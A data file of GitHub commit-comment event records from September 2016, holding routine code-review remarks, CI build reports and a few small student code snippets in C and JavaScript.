{"id":"4584334332","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081451,"position":67,"line":67,"path":"browser/js/cart/view/cart.factory.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:30:49Z","updated_at":"2016-09-19T16:30:49Z","body":"Again maybe a `localStorage` factory is a good idea"}},"created_at":"2016-09-19T16:30:49Z"}
{"id":"4584335189","type":"CommitCommentEvent","actor":{"login":"dukeboard"},"repo":{"name":"kevoree-modeling/mwDB"},"payload":{"comment":{"id":19081453,"position":null,"line":null,"path":null,"commit_id":"6398a766929c4ccb1d3a11f71cb5544f939f99c5","created_at":"2016-09-19T16:30:56Z","updated_at":"2016-09-19T16:30:56Z","body":"True :-) no other way todo right now but i will think about it :-)\r\n"}},"created_at":"2016-09-19T16:30:56Z"}
{"id":"4584342641","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19081467,"position":39,"line":39,"path":"browser/js/cart/cart.js","commit_id":"d8d0cf174a58695ab782994e0ba69d4575148d13","created_at":"2016-09-19T16:32:07Z","updated_at":"2016-09-19T16:32:07Z","body":"There is a lot going on in this controller - some of this can be abstracted out into our factory"}},"created_at":"2016-09-19T16:32:07Z"}
{"id":"4584344476","type":"CommitCommentEvent","actor":{"login":"ncguy2"},"repo":{"name":"ncguy2/MOD003263"},"payload":{"comment":{"id":19081475,"position":7,"line":22,"path":"Mod003263/Mod003263/Plane.cs","commit_id":"bd66761a5011056f4de41553ae4a24ce65e58f73","created_at":"2016-09-19T16:32:24Z","updated_at":"2016-09-19T16:32:24Z","body":"Am testing WebHook functionality"}},"created_at":"2016-09-19T16:32:24Z"}
{"id":"4584344764","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19081477,"position":50,"line":50,"path":"browser/js/cart/view/cart.controller.js","commit_id":"1a747de032a0801d75a951c4b7f68ec4b9bfda54","created_at":"2016-09-19T16:32:27Z","updated_at":"2016-09-19T16:32:27Z","body":"Definitely doesn't seem like a controller should know about `localStorage`. There is some kind of abstraction that should be used instead — e.g. call a `CartFactory` method which in turn uses a `LocalStorageFactory` method. This controller is getting too much into the implementation details of the cart."}},"created_at":"2016-09-19T16:32:27Z"}
{"id":"4584354762","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mpullis/personal-website"},"payload":{"comment":{"id":19081488,"position":8,"line":7,"path":"index.html","commit_id":"fbb7263fd3fbdd2b9ca3e7fa70d1c97f7c18963d","created_at":"2016-09-19T16:33:55Z","updated_at":"2016-09-19T16:33:55Z","body":"Make sure you always use straight quote marks, the curved ones can cause problems. (All of your meta tags are using the curved ones)."}},"created_at":"2016-09-19T16:33:55Z"}
{"id":"4584354800","type":"CommitCommentEvent","actor":{"login":"yohanboniface"},"repo":{"name":"Leaflet/Leaflet"},"payload":{"comment":{"id":19081489,"position":null,"line":null,"path":null,"commit_id":"0cfe85897fef257d952d1cec5a5a11005fa66da0","created_at":"2016-09-19T16:33:55Z","updated_at":"2016-09-19T16:33:55Z","body":"Please create an issue with a minimal reproducible test case, and details about your OS, browser, and such."}},"created_at":"2016-09-19T16:33:55Z"}
{"id":"4584356670","type":"CommitCommentEvent","actor":{"login":"diegogoding"},"repo":{"name":"gandm/language-babel"},"payload":{"comment":{"id":19081493,"position":null,"line":null,"path":null,"commit_id":"99944a66a788678e3faad68ba4b48d244906aec6","created_at":"2016-09-19T16:34:16Z","updated_at":"2016-09-19T16:34:16Z","body":"Your changes to language-graphql-lb package is causing apm to push an\n'update' to atom. You might want to pull out language-graphql-lb from the\nbabel-language. For language-babel each recent release has just appeared to\nbe increment to release version in your package.json.\n\n\n\nOn Mon, Sep 19, 2016 at 11:23 AM, Graham <notifications@github.com> wrote:\n\n> I added a bit to the README and also made some minor changes to the scopes\n> and styles used in GraphQL.\n> See 2caaae9\n> <https://github.com/gandm/language-babel/commit/2caaae9e59513e72783f5c5565936ce3adfd0cb4>\n> and the CHANGELOG for more info.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gandm/language-babel/commit/99944a66a788678e3faad68ba4b48d244906aec6#commitcomment-19081343>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFPIFPH28qLnFelH3lnCIigz2T4MunM_ks5qrrcUgaJpZM4KAoCV>\n> .\n>\n"}},"created_at":"2016-09-19T16:34:16Z"}
{"id":"4584356953","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19081494,"position":null,"line":null,"path":null,"commit_id":"9a8d5fd2527391c862699916be181773c3ace3b3","created_at":"2016-09-19T16:34:18Z","updated_at":"2016-09-19T16:34:18Z","body":"makingPrettyTransition (mitchute) - x86_64-MacOS-10.9-clang: OK (2325 of 2332 tests passed, 3 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9a8d5fd2527391c862699916be181773c3ace3b3-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T16:34:18Z"}
{"id":"4584358658","type":"CommitCommentEvent","actor":{"login":"ObaniGemini"},"repo":{"name":"KOBUGE-Games/minilens"},"payload":{"comment":{"id":19081499,"position":75,"line":86,"path":"entities/player.gd","commit_id":"05514fa97a617bc46761e2da2c8849608aab5b81","created_at":"2016-09-19T16:34:33Z","updated_at":"2016-09-19T16:34:33Z","body":"ops"}},"created_at":"2016-09-19T16:34:33Z"}
{"id":"4584359463","type":"CommitCommentEvent","actor":{"login":"kjpou1"},"repo":{"name":"xamarin/WebSharp"},"payload":{"comment":{"id":19081502,"position":null,"line":null,"path":null,"commit_id":"669fdb7c1563e9904e4cc73ae2938b8713486741","created_at":"2016-09-19T16:34:41Z","updated_at":"2016-09-19T16:34:41Z","body":"Thanks for the heads up.  Will fix it."}},"created_at":"2016-09-19T16:34:41Z"}
{"id":"4584363652","type":"CommitCommentEvent","actor":{"login":"SanketTijare"},"repo":{"name":"SanketTijare/Diabetes-Pridictor"},"payload":{"comment":{"id":19081510,"position":null,"line":null,"path":null,"commit_id":"82d129cca2fa46a2be9fed6597ae32d12d34e064","created_at":"2016-09-19T16:35:18Z","updated_at":"2016-09-19T16:35:18Z","body":"[Diabetes_Prediction_Report.pdf](https://github.com/SanketTijare/Diabetes-Pridictor/files/480566/Diabetes_Prediction_Report.pdf)\r\n"}},"created_at":"2016-09-19T16:35:18Z"}
{"id":"4584366042","type":"CommitCommentEvent","actor":{"login":"mstuttgart"},"repo":{"name":"OCA/l10n-brazil"},"payload":{"comment":{"id":19081515,"position":null,"line":null,"path":null,"commit_id":"dddaea2ca2f8fe20f22f04bce1a9ab9f3c78408c","created_at":"2016-09-19T16:35:38Z","updated_at":"2016-09-19T16:35:38Z","body":"@mbcosta por qual razão esse módulo foi removido?"}},"created_at":"2016-09-19T16:35:38Z"}
{"id":"4584370727","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mpullis/personal-website"},"payload":{"comment":{"id":19081524,"position":7,"line":9,"path":"styles/style.css","commit_id":"fbb7263fd3fbdd2b9ca3e7fa70d1c97f7c18963d","created_at":"2016-09-19T16:36:21Z","updated_at":"2016-09-19T16:36:21Z","body":"Remember to use @fontface or an online service like Google Fonts for special fonts like Futura."}},"created_at":"2016-09-19T16:36:21Z"}
{"id":"4584372587","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mpullis/personal-website"},"payload":{"comment":{"id":19081529,"position":21,"line":22,"path":"styles/style.css","commit_id":"fbb7263fd3fbdd2b9ca3e7fa70d1c97f7c18963d","created_at":"2016-09-19T16:36:40Z","updated_at":"2016-09-19T16:36:40Z","body":"sans-serif is all lowercase."}},"created_at":"2016-09-19T16:36:40Z"}
{"id":"4584373363","type":"CommitCommentEvent","actor":{"login":"Pinzauti"},"repo":{"name":"emergenzeHack/terremotocentro"},"payload":{"comment":{"id":19081531,"position":null,"line":null,"path":null,"commit_id":"4f1a32886b4d7c9378782905e436b94719b6eab7","created_at":"2016-09-19T16:36:48Z","updated_at":"2016-09-19T16:36:48Z","body":"#316 "}},"created_at":"2016-09-19T16:36:48Z"}
{"id":"4584374177","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19081534,"position":null,"line":null,"path":null,"commit_id":"cacd104162753ada422553ef2399e60915136862","created_at":"2016-09-19T16:36:57Z","updated_at":"2016-09-19T16:36:57Z","body":"Also see [Commit f57c4dced5bfbcd1](https://github.com/weidai11/cryptopp/commit/f57c4dced5bfbcd10d0883ae7161833a70eff268) and [Move config.h to config.compat; move config.recommend to config.h](http://groups.google.com/forum/#!topic/cryptopp-users/bWcRw1XgJ_Q) on the mailing list."}},"created_at":"2016-09-19T16:36:57Z"}
{"id":"4584374585","type":"CommitCommentEvent","actor":{"login":"hianrodrigo"},"repo":{"name":"hianrodrigo/primeiro-projeto"},"payload":{"comment":{"id":19081536,"position":2,"line":2,"path":"README.md","commit_id":"419113afe7876d30b7a60727372943fdeaaa0a4d","created_at":"2016-09-19T16:37:02Z","updated_at":"2016-09-19T16:37:02Z","body":"#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n\r\nvoid saindo (bool *mudar){\r\n\r\n*mudar = true;\r\n\r\n}\r\n\r\n\r\nvoid segundaVez (bool *mudar){\r\n\r\n*mudar = false;\r\n\r\n}\r\n\r\n\r\nvoid mult (int *x, int *y, int *rest, bool *verificar){\r\n\r\n if(*verificar == true){\r\n \r\n*rest=*x  *  *y;\r\n }else {\r\n\r\n*rest = *rest * *y;\r\n}\r\n}\r\n\r\n\r\nvoid divisao (int *x, int *y, int *rest, bool *verificar){\r\n\r\n if(*verificar == true){\r\n \r\n*rest=*x / *y;\r\n }else {\r\n\r\n*rest = *rest / *y;\r\n\r\n}\r\n}\r\n\r\nvoid sub (int *x, int *y, int *rest, bool *verificar){\r\n\r\n\r\n if(*verificar == true){\r\n \r\n*rest=*x-*y;\r\n }else {\r\n\r\n*rest = *rest - *y;\r\n\r\n}\r\n}\r\n\r\nvoid soma (int *x, int *y, int *rest, bool *verificar){\r\n \r\n \r\n if(*verificar == true){\r\n \r\n*rest=*x+*y;\r\n }else {\r\n\r\n*rest = *rest + *y;\r\n\r\n}\r\n\r\n \r\n}\r\n\r\n  void menu (int *resultado) {\r\nint a;\r\nint b;\r\n\r\n  int r = *resultado;\r\nbool primeiraVez = true;\r\nbool sair = false;\r\n\r\n\r\n        while (sair == false){\r\n\r\n\r\nif( primeiraVez == true){\r\n\r\n\r\nprintf(\"escolha os dois numeros: \\n\");\r\n\r\n\r\nscanf(\"%d\", &a);\r\nscanf(\"%d\", &b);\r\n \r\n    \r\n\r\n\r\n          int opcao;\r\n          printf(\"[1] soma \\n [2] subitrção \\n [3] multiplicação \\n [4] divisao \\n [5] sair \\n\");\r\n          scanf(\" %d\", &opcao);\r\n\r\n\r\n          switch(opcao){\r\n\r\n\r\ncase 1:\r\nsoma(&a,&b,&r,&primeiraVez);\r\nprintf(\"o resultado da soma dos 2 numeros é: %d \\n \" , r);\r\n*resultado = r;\r\nsegundaVez(&primeiraVez);\r\nbreak;\r\n\r\n\r\ncase 2:\r\nsub(&a,&b,&r,&primeiraVez);\r\nprintf(\"o resultado da subtração dos 2 numeros é: %d \\n \" , r);\r\n*resultado = r;\r\nsegundaVez(&primeiraVez);\r\nbreak;\r\n\r\n\r\ncase 3:\r\nmult(&a,&b,&r,&primeiraVez);\r\nprintf(\"o resultado da multiplicação dos 2 numeros é: %d \\n \" , r);\r\n*resultado = r;\r\nsegundaVez(&primeiraVez);\r\nbreak;\r\n\r\n\r\ncase 4:\r\ndivisao(&a,&b,&r,&primeiraVez);\r\nprintf(\"o resultado da divisão dos 2 numeros é: %d \\n \" , r);\r\n*resultado = r;\r\nsegundaVez(&primeiraVez);\r\nbreak;\r\n\r\n\r\n\r\ncase 5:\r\nsaindo(&sair);\r\nbreak;\r\n\r\n\r\ndefault :\r\nprintf(\"opção errada errada \\n\");\r\n}\r\n} else {\r\n     \r\n\r\nprintf(\"escolha um numero para ultilizar com o resltado e depois escolha a opção \\n\");\r\nscanf(\" %d\", &b);\r\n\r\n\r\n         int opcao;\r\n         printf(\"[1] soma \\n [2] subitrção \\n [3] multiplicação \\n [4] divisao \\n [5] sair \\n\");\r\n       scanf(\" %d\", &opcao);\r\n\r\n\r\n          switch(opcao){\r\ncase 1:\r\nsoma(&a,&b,&r,&primeiraVez);\r\n*resultado = r;\r\nprintf(\"o resultado da soma dos 2 numeros é: %d \\n \" , r);\r\nbreak;\r\n\r\n\r\ncase 2:\r\nsub(&a,&b,&r,&primeiraVez);\r\n*resultado = r;\r\nprintf(\"o resultado da soma dos 2 numeros é: %d \\n \" , r);\r\nbreak;\r\n\r\n\r\ncase 3:\r\nmult(&a,&b,&r,&primeiraVez);\r\n*resultado = r;\r\nprintf(\"o resultado da soma dos 2 numeros é: %d \\n \" , r);\r\nbreak;\r\n\r\n\r\ncase 4:\r\ndivisao(&a,&b,&r,&primeiraVez);\r\n*resultado = r;\r\nprintf(\"o resultado da soma dos 2 numeros é: %d \\n \" , r);\r\nbreak;\r\n\r\n\r\n\r\ncase 5:\r\nsaindo(&sair);\r\nbreak;\r\n\r\n\r\ndefault :\r\nprintf(\"errado \\n\");\r\n}\r\n\r\n\r\n\r\n\r\n}\r\n\r\n}\r\n\r\n\r\n} \r\n\r\n\r\n\r\nint main(void) {\r\nint result = 0;\r\nmenu(&result);\r\nsystem (\"pause\");\r\nreturn 0;\r\n}\r\n\r\n"}},"created_at":"2016-09-19T16:37:02Z"}
{"id":"4584375765","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19081543,"position":null,"line":null,"path":null,"commit_id":"8adf77726df70c8226a8d402035a5255b63eee55","created_at":"2016-09-19T16:37:16Z","updated_at":"2016-09-19T16:37:16Z","body":"It might have been, hmm. I'll integrate and test again."}},"created_at":"2016-09-19T16:37:16Z"}
{"id":"4584375874","type":"CommitCommentEvent","actor":{"login":"Pinzauti"},"repo":{"name":"emergenzeHack/terremotocentro"},"payload":{"comment":{"id":19081544,"position":null,"line":null,"path":null,"commit_id":"11c58d878a8a6a34136c4f75c93c586a9877a448","created_at":"2016-09-19T16:37:17Z","updated_at":"2016-09-19T16:37:17Z","body":"#316 "}},"created_at":"2016-09-19T16:37:17Z"}
{"id":"4584376513","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19081546,"position":25,"line":25,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T16:37:24Z","updated_at":"2016-09-19T16:37:24Z","body":"OK..."}},"created_at":"2016-09-19T16:37:24Z"}
{"id":"4584378530","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19081550,"position":null,"line":null,"path":null,"commit_id":"8adf77726df70c8226a8d402035a5255b63eee55","created_at":"2016-09-19T16:37:42Z","updated_at":"2016-09-19T16:37:42Z","body":"@ilteroi is this savegame compatible?"}},"created_at":"2016-09-19T16:37:42Z"}
{"id":"4584379984","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19081554,"position":null,"line":null,"path":null,"commit_id":"151521d68feb610f04832c9039daaedf2514b8e4","created_at":"2016-09-19T16:37:54Z","updated_at":"2016-09-19T16:37:54Z","body":"We can't gut `CRYPTOPP_MAINTAIN_BACKWARDS_COMPATIBILITY` and `CRYPTOPP_MAINTAIN_BACKWARDS_COMPATIBILITY_562` because `config.compat` still uses it."}},"created_at":"2016-09-19T16:37:54Z"}
{"id":"4584381755","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19081555,"position":null,"line":null,"path":null,"commit_id":"02cb2d050c2edfc46aa0507d46c1b30763467e25","created_at":"2016-09-19T16:38:13Z","updated_at":"2016-09-19T16:38:13Z","body":"Sounds good. I'll add and push a hotfix."}},"created_at":"2016-09-19T16:38:13Z"}
{"id":"4584381991","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19081556,"position":27,"line":27,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T16:38:15Z","updated_at":"2016-09-19T16:38:15Z","body":"OK..."}},"created_at":"2016-09-19T16:38:15Z"}
{"id":"4584389962","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mpullis/personal-website"},"payload":{"comment":{"id":19081567,"position":23,"line":16,"path":"index.html","commit_id":"fbb7263fd3fbdd2b9ca3e7fa70d1c97f7c18963d","created_at":"2016-09-19T16:39:28Z","updated_at":"2016-09-19T16:39:28Z","body":"You need too add `display: inline-block;` to the two divs that should be inline with each other. You'll also need to decrease the width till they fit. Even though you're using percentages which add up to 100%, the padding on the left and right is being added to that as well. So either remove the left and right padding or add this to both divs `box-sizing: border-box;` < we'll learn that soon."}},"created_at":"2016-09-19T16:39:28Z"}
{"id":"4584390481","type":"CommitCommentEvent","actor":{"login":"Gabriel25569"},"repo":{"name":"GuiBrandt/Projeto"},"payload":{"comment":{"id":19081570,"position":null,"line":null,"path":null,"commit_id":"8b694037d4ba8bfa1d99d015a34daa09e6061281","created_at":"2016-09-19T16:39:32Z","updated_at":"2016-09-19T16:39:32Z","body":"ainda vai cria, o br eh um mito no cs um bosta"}},"created_at":"2016-09-19T16:39:32Z"}
{"id":"4584392620","type":"CommitCommentEvent","actor":{"login":"gandm"},"repo":{"name":"gandm/language-babel"},"payload":{"comment":{"id":19081575,"position":null,"line":null,"path":null,"commit_id":"99944a66a788678e3faad68ba4b48d244906aec6","created_at":"2016-09-19T16:39:49Z","updated_at":"2016-09-19T16:39:49Z","body":"I'm not sure what you mean? They are two separate packages that are targeted at different things. They don't share any common components, all I did was copied a chunk of my grammar and made another package. Language-Babel is distinct from language-graphql-lb."}},"created_at":"2016-09-19T16:39:49Z"}
{"id":"4584396510","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19081579,"position":146,"line":146,"path":"browser/js/cart/cart.js","commit_id":"d8d0cf174a58695ab782994e0ba69d4575148d13","created_at":"2016-09-19T16:40:27Z","updated_at":"2016-09-19T16:40:27Z","body":"It seems to me like some of this cart logic can be simplified. What are we doing when we add an item to the cart? Are we storing the cart in the database? We are performing many steps by storing the cart as a string and then getting the product names and then getting the product objects - is there a simpler way to do this?"}},"created_at":"2016-09-19T16:40:27Z"}
{"id":"4584396668","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"edwardtufte/tufte-css"},"payload":{"comment":{"id":19081580,"position":null,"line":null,"path":null,"commit_id":"b59fc8621ea38162f90a7213c09a1ce2edcbcf86","created_at":"2016-09-19T16:40:28Z","updated_at":"2016-09-19T16:40:28Z","body":"thx"}},"created_at":"2016-09-19T16:40:28Z"}
{"id":"4584398125","type":"CommitCommentEvent","actor":{"login":"YaroslavW"},"repo":{"name":"YaroslavW/JavaScript"},"payload":{"comment":{"id":19081587,"position":17,"line":17,"path":"Степень числа","commit_id":"7cbc8d5d2dcdd6ff7986f05c275155c501fe175b","created_at":"2016-09-19T16:40:42Z","updated_at":"2016-09-19T16:40:42Z","body":"function pow(x, n) {\r\nresult = 1;\r\nfor (var i = 0; i < n; i++) {\r\n  result *=x;\r\n}\r\nreturn result;\r\n}\r\n\r\nvar x = prompt(\"press x\" , \"\");\r\nvar n = prompt(\"press n\" , \"\");\r\nif (n < 0) {\r\n  alert(\"Wrong!\");\r\n} else {\r\nalert( pow(x, n));\r\n}\r\n"}},"created_at":"2016-09-19T16:40:42Z"}
{"id":"4584398805","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19081588,"position":null,"line":null,"path":null,"commit_id":"714daaf5706e9e2b196beb5446cc4f53d1652c75","created_at":"2016-09-19T16:40:48Z","updated_at":"2016-09-19T16:40:48Z","body":"I tried to perform the following to put an end to this madness once and for all:\r\n\r\n```\r\n#if defined(__GNUC__) && defined(__clang__)\r\n# undef __GNUC__\r\n# undef __GNUC_MINOR__\r\n# undef __GNUC_PATCHLEVEL__\r\n# define __GNUC__ 1\r\n#endif\r\n```\r\n\r\nIt results in the following on OS X:\r\n\r\n```\r\n$ CXX=c++ make \r\nc++ -DNDEBUG -g2 -O2 -fPIC -march=native -pipe -c cryptlib.cpp\r\nIn file included from cryptlib.cpp:18:\r\nIn file included from ./cryptlib.h:87:\r\nIn file included from ./stdcpp.h:9:\r\nIn file included from /usr/include/c++/4.2.1/string:45:\r\nIn file included from /usr/include/c++/4.2.1/bits/c++config.h:41:\r\nIn file included from /usr/include/c++/4.2.1/bits/os_defines.h:61:\r\nIn file included from /usr/include/unistd.h:71:\r\nIn file included from /usr/include/_types.h:27:\r\nIn file included from /usr/include/sys/_types.h:32:\r\n/usr/include/sys/cdefs.h:81:2: warning: \"Unsupported compiler detected\"\r\n      [-W#warnings]\r\n#warning \"Unsupported compiler detected\"\r\n```\r\n\r\nAnd:\r\n\r\n``\r\n$ CXX=clang++ make \r\nclang++ -DNDEBUG -g2 -O2 -fPIC -march=native -pipe -c cryptlib.cpp\r\nIn file included from cryptlib.cpp:18:\r\nIn file included from ./cryptlib.h:87:\r\nIn file included from ./stdcpp.h:9:\r\nIn file included from /usr/include/c++/4.2.1/string:45:\r\nIn file included from /usr/include/c++/4.2.1/bits/c++config.h:41:\r\nIn file included from /usr/include/c++/4.2.1/bits/os_defines.h:61:\r\nIn file included from /usr/include/unistd.h:71:\r\nIn file included from /usr/include/_types.h:27:\r\nIn file included from /usr/include/sys/_types.h:32:\r\n/usr/include/sys/cdefs.h:81:2: warning: \"Unsupported compiler detected\"\r\n      [-W#warnings]\r\n#warning \"Unsupported compiler detected\"\r\n```\r\n"}},"created_at":"2016-09-19T16:40:48Z"}
{"id":"4584403881","type":"CommitCommentEvent","actor":{"login":"cdiacon"},"repo":{"name":"dotmailer/dotmailer-magento-extension"},"payload":{"comment":{"id":19081592,"position":33,"line":232,"path":"code/Dotdigitalgroup/Email/Model/Sales/Order.php","commit_id":"d535ef65e9e6595eb5fdb7629fad45f446744c84","created_at":"2016-09-19T16:41:36Z","updated_at":"2016-09-19T16:41:36Z","body":"@adeelq some guest orders can have no customer email address but can be found in billing address.\r\n\r\nshould check for $order->getCustomerEmail() for an email before adding to the contact table."}},"created_at":"2016-09-19T16:41:36Z"}
{"id":"4584405151","type":"CommitCommentEvent","actor":{"login":"JoshRosen"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19081595,"position":163,"line":811,"path":"core/src/main/scala/org/apache/spark/storage/memory/MemoryStore.scala","commit_id":"8faa5217b44e8d52eab7eb2d53d0652abaaf43cd","created_at":"2016-09-19T16:41:47Z","updated_at":"2016-09-19T16:41:47Z","body":"Yes, but that should be fine given that `OutputStream.close()` is supposed to be idempotent. If an `OutputStream` subclass somehow has a non-idempotent `close()` method then we should wrap that output stream with a wrapper that enforces idempotency by only calling the wrapped `close()` method once."}},"created_at":"2016-09-19T16:41:47Z"}
{"id":"4584407581","type":"CommitCommentEvent","actor":{"login":"javajohnHub"},"repo":{"name":"DBa2016/PokemonGo-Bot"},"payload":{"comment":{"id":19081603,"position":null,"line":null,"path":null,"commit_id":"1bdc39691d4085a406c145e05a70f60da272bbea","created_at":"2016-09-19T16:42:13Z","updated_at":"2016-09-19T16:42:13Z","body":"I dont think removing the events is necassary anymore. The events to discard can be removed."}},"created_at":"2016-09-19T16:42:13Z"}
{"id":"4584414163","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19081614,"position":null,"line":null,"path":null,"commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-19T16:43:17Z","updated_at":"2016-09-19T16:43:17Z","body":"One little issue is that if I go to the get_a_profile page, then click the login button and then log in, I get redirected back to the get_a_profile page."}},"created_at":"2016-09-19T16:43:17Z"}
{"id":"4584416436","type":"CommitCommentEvent","actor":{"login":"coderlazy"},"repo":{"name":"coderlazy/bet188"},"payload":{"comment":{"id":19081619,"position":null,"line":null,"path":null,"commit_id":"dd6ff420a08279aaacb11e8fcb7db5ebfb8e7324","created_at":"2016-09-19T16:43:38Z","updated_at":"2016-09-19T16:43:38Z","body":"oh shit! this version on github and fixed on heroku master"}},"created_at":"2016-09-19T16:43:38Z"}
{"id":"4584421814","type":"CommitCommentEvent","actor":{"login":"tyler-sassaman"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19081626,"position":null,"line":null,"path":null,"commit_id":"024d51bb1952d97a540f962086f53fb257cdb741","created_at":"2016-09-19T16:44:29Z","updated_at":"2016-09-19T16:44:29Z","body":"We just need to make sure that we are using the HTTP message protocol that we outlined in class. I also have the other documents completed that we need to upload to the dropbox with this project...I will add them later today(one of which includes the message protocol that we outlined in class)."}},"created_at":"2016-09-19T16:44:29Z"}
{"id":"4584421942","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19081627,"position":34,"line":34,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T16:44:30Z","updated_at":"2016-09-19T16:44:30Z","body":"I am not sure why that happened. In my IDE I can't see any deference between line 33 and line 34.. I will check that out."}},"created_at":"2016-09-19T16:44:30Z"}
{"id":"4584423022","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/cer"},"payload":{"comment":{"id":19081629,"position":null,"line":null,"path":null,"commit_id":"2a67fc7cd87e094fd553797d3488616158932ffe","created_at":"2016-09-19T16:44:41Z","updated_at":"2016-09-19T16:44:41Z","body":"These cmake helpers are required when compiling the project against an installed version of `yarp`."}},"created_at":"2016-09-19T16:44:41Z"}
{"id":"4584428569","type":"CommitCommentEvent","actor":{"login":"ChunbiJiang"},"repo":{"name":"ChunbiJiang/Algorithm_course-project"},"payload":{"comment":{"id":19081634,"position":null,"line":null,"path":null,"commit_id":"1e333f8fc893dde6e1f85fe21c3190e3006fd496","created_at":"2016-09-19T16:45:34Z","updated_at":"2016-09-19T16:45:34Z","body":"N"}},"created_at":"2016-09-19T16:45:34Z"}
{"id":"4584429243","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":19081637,"position":null,"line":null,"path":null,"commit_id":"b3bb5f1361a4b11f6d93ba235c4464c74eaf6c85","created_at":"2016-09-19T16:45:41Z","updated_at":"2016-09-19T16:45:41Z","body":"@drdanz thanks for the clarification.\r\nI've then added those cmake helpers into `cer`: see https://github.com/robotology/cer/commit/2a67fc7cd87e094fd553797d3488616158932ffe.\r\n\r\nThey're required when compiling `cer` against an installed version of `yarp`."}},"created_at":"2016-09-19T16:45:41Z"}
{"id":"4584429995","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19081639,"position":null,"line":null,"path":null,"commit_id":"4b1d08727250668b1de3f896b5332f2b9e3df1f4","created_at":"2016-09-19T16:45:47Z","updated_at":"2016-09-19T16:45:47Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4b1d08727250668b1de3f896b5332f2b9e3df1f4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4b1d08727250668b1de3f896b5332f2b9e3df1f4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4b1d08727250668b1de3f896b5332f2b9e3df1f4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-19T16:45:47Z"}
